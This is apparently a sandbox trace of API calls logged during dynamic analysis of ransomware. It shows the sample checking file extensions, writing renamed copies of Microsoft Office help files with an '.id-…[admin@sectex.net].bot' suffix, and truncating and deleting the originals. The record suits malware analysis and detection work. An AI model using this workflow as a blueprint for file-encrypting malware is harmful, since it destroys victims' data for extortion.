	[0152.803] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.803] lstrlenW (lpString=".xls") returned 4
	[0152.803] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.803] lstrlenW (lpString=".xlsx") returned 5
	[0152.803] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.803] lstrlenW (lpString=".ppt") returned 4
	[0152.803] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString=".zip") returned 4
	[0152.803] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.803] lstrlenW (lpString=".rar") returned 4
	[0152.803] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.803] lstrlenW (lpString=".bz2") returned 4
	[0152.803] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.803] lstrlenW (lpString=".7z") returned 3
	[0152.803] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString=".dbf") returned 4
	[0152.803] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString=".1cd") returned 4
	[0152.803] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.803] lstrlenW (lpString=".jpg") returned 4
	[0152.803] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString=".doc") returned 4
	[0152.804] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.804] lstrlenW (lpString=".docx") returned 5
	[0152.804] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.804] lstrlenW (lpString=".pdf") returned 4
	[0152.804] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString=".xls") returned 4
	[0152.804] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString=".xlsx") returned 5
	[0152.804] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.804] lstrlenW (lpString=".ppt") returned 4
	[0152.804] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString=".zip") returned 4
	[0152.804] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString=".rar") returned 4
	[0152.804] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0152.804] lstrlenW (lpString=".bz2") returned 4
	[0152.804] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0152.804] lstrlenW (lpString=".7z") returned 3
	[0152.804] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString=".dbf") returned 4
	[0152.804] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString=".1cd") returned 4
	[0152.804] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0152.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO.SHAPESHEET_K_COL.HXK") returned 74
	[0152.804] lstrlenW (lpString=".jpg") returned 4
	[0152.804] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0152.805] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0152.805] lstrlenW (lpString="VISIO_COL.HXC") returned 13
	[0152.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.805] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=621) returned 1
	[0152.805] CloseHandle (hObject=0x2a0) returned 1
	[0152.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc")) returned 0x20
	[0152.805] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.806] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.806] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.806] GetLastError () returned 0x0
	[0152.806] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x26d, lpOverlapped=0x0) returned 1
	[0152.809] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x270, lpOverlapped=0x0) returned 1
	[0152.811] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.811] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0152.811] SetEndOfFile (hFile=0x384) returned 1
	[0152.811] CloseHandle (hObject=0x384) returned 1
	[0152.812] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.812] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.814] CloseHandle (hObject=0x2a0) returned 1
	[0152.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.814] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxc")) returned 1
	[0152.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.814] lstrlenW (lpString=".doc") returned 4
	[0152.815] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.815] lstrlenW (lpString=".docx") returned 5
	[0152.815] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.815] lstrlenW (lpString=".pdf") returned 4
	[0152.815] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString=".xls") returned 4
	[0152.815] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString=".xlsx") returned 5
	[0152.815] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.815] lstrlenW (lpString=".ppt") returned 4
	[0152.815] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.815] lstrlenW (lpString=".zip") returned 4
	[0152.815] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString=".rar") returned 4
	[0152.815] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString=".bz2") returned 4
	[0152.815] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.815] lstrlenW (lpString=".7z") returned 3
	[0152.815] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.815] lstrlenW (lpString=".dbf") returned 4
	[0152.815] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.815] lstrlenW (lpString=".1cd") returned 4
	[0152.815] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.815] lstrlenW (lpString=".jpg") returned 4
	[0152.815] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.816] lstrlenW (lpString=".doc") returned 4
	[0152.816] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0152.816] lstrlenW (lpString=".docx") returned 5
	[0152.816] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0152.816] lstrlenW (lpString=".pdf") returned 4
	[0152.816] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0152.816] lstrlenW (lpString=".xls") returned 4
	[0152.816] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0152.816] lstrlenW (lpString=".xlsx") returned 5
	[0152.816] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0152.816] lstrlenW (lpString=".ppt") returned 4
	[0152.816] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0152.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.816] lstrlenW (lpString=".zip") returned 4
	[0152.816] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0152.816] lstrlenW (lpString=".rar") returned 4
	[0152.816] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0152.816] lstrlenW (lpString=".bz2") returned 4
	[0152.816] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0152.816] lstrlenW (lpString=".7z") returned 3
	[0152.816] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0152.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.816] lstrlenW (lpString=".dbf") returned 4
	[0152.816] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0152.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.816] lstrlenW (lpString=".1cd") returned 4
	[0152.816] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0152.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXC") returned 61
	[0152.816] lstrlenW (lpString=".jpg") returned 4
	[0152.816] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0152.817] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0152.817] lstrlenW (lpString="VISIO_COL.HXT") returned 13
	[0152.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.817] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=205) returned 1
	[0152.817] CloseHandle (hObject=0x2a0) returned 1
	[0152.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt")) returned 0x20
	[0152.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.818] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.818] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.818] GetLastError () returned 0x0
	[0152.818] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xcd, lpOverlapped=0x0) returned 1
	[0152.819] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0152.820] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.820] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0152.820] SetEndOfFile (hFile=0x384) returned 1
	[0152.820] CloseHandle (hObject=0x384) returned 1
	[0152.821] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.821] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.826] CloseHandle (hObject=0x2a0) returned 1
	[0152.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.827] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_col.hxt")) returned 1
	[0152.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.827] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.827] lstrlenW (lpString=".doc") returned 4
	[0152.827] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.827] lstrlenW (lpString=".docx") returned 5
	[0152.827] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.827] lstrlenW (lpString=".pdf") returned 4
	[0152.827] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.827] lstrlenW (lpString=".xls") returned 4
	[0152.827] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.827] lstrlenW (lpString=".xlsx") returned 5
	[0152.827] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.828] lstrlenW (lpString=".ppt") returned 4
	[0152.828] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString=".zip") returned 4
	[0152.828] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString=".rar") returned 4
	[0152.828] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString=".bz2") returned 4
	[0152.828] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.828] lstrlenW (lpString=".7z") returned 3
	[0152.828] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString=".dbf") returned 4
	[0152.828] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString=".1cd") returned 4
	[0152.828] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString=".jpg") returned 4
	[0152.828] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.828] lstrlenW (lpString=".doc") returned 4
	[0152.828] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0152.828] lstrlenW (lpString=".docx") returned 5
	[0152.828] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0152.828] lstrlenW (lpString=".pdf") returned 4
	[0152.828] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString=".xls") returned 4
	[0152.828] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0152.828] lstrlenW (lpString=".xlsx") returned 5
	[0152.829] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0152.829] lstrlenW (lpString=".ppt") returned 4
	[0152.829] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0152.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.829] lstrlenW (lpString=".zip") returned 4
	[0152.829] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0152.829] lstrlenW (lpString=".rar") returned 4
	[0152.829] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0152.829] lstrlenW (lpString=".bz2") returned 4
	[0152.829] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0152.829] lstrlenW (lpString=".7z") returned 3
	[0152.829] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0152.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.829] lstrlenW (lpString=".dbf") returned 4
	[0152.829] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0152.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.829] lstrlenW (lpString=".1cd") returned 4
	[0152.829] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0152.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_COL.HXT") returned 61
	[0152.829] lstrlenW (lpString=".jpg") returned 4
	[0152.829] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0152.829] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0152.829] lstrlenW (lpString="VISIO_F_COL.HXK") returned 15
	[0152.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.830] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0152.830] CloseHandle (hObject=0x2a0) returned 1
	[0152.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk")) returned 0x20
	[0152.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0152.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0152.830] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.831] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0152.831] GetLastError () returned 0x0
	[0152.831] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0152.832] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0152.833] ReadFile (in: hFile=0x2a0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0152.833] WriteFile (in: hFile=0x384, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0152.833] SetEndOfFile (hFile=0x384) returned 1
	[0152.833] CloseHandle (hObject=0x384) returned 1
	[0152.833] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0152.833] SetEndOfFile (hFile=0x2a0) returned 1
	[0152.836] CloseHandle (hObject=0x2a0) returned 1
	[0152.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.836] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_f_col.hxk")) returned 1
	[0152.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.837] lstrlenW (lpString=".doc") returned 4
	[0152.838] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0152.838] lstrlenW (lpString=".docx") returned 5
	[0152.838] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0152.838] lstrlenW (lpString=".pdf") returned 4
	[0152.838] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString=".xls") returned 4
	[0152.838] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString=".xlsx") returned 5
	[0152.838] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0152.838] lstrlenW (lpString=".ppt") returned 4
	[0152.838] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0152.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_F_COL.HXK") returned 63
	[0152.838] lstrlenW (lpString=".zip") returned 4
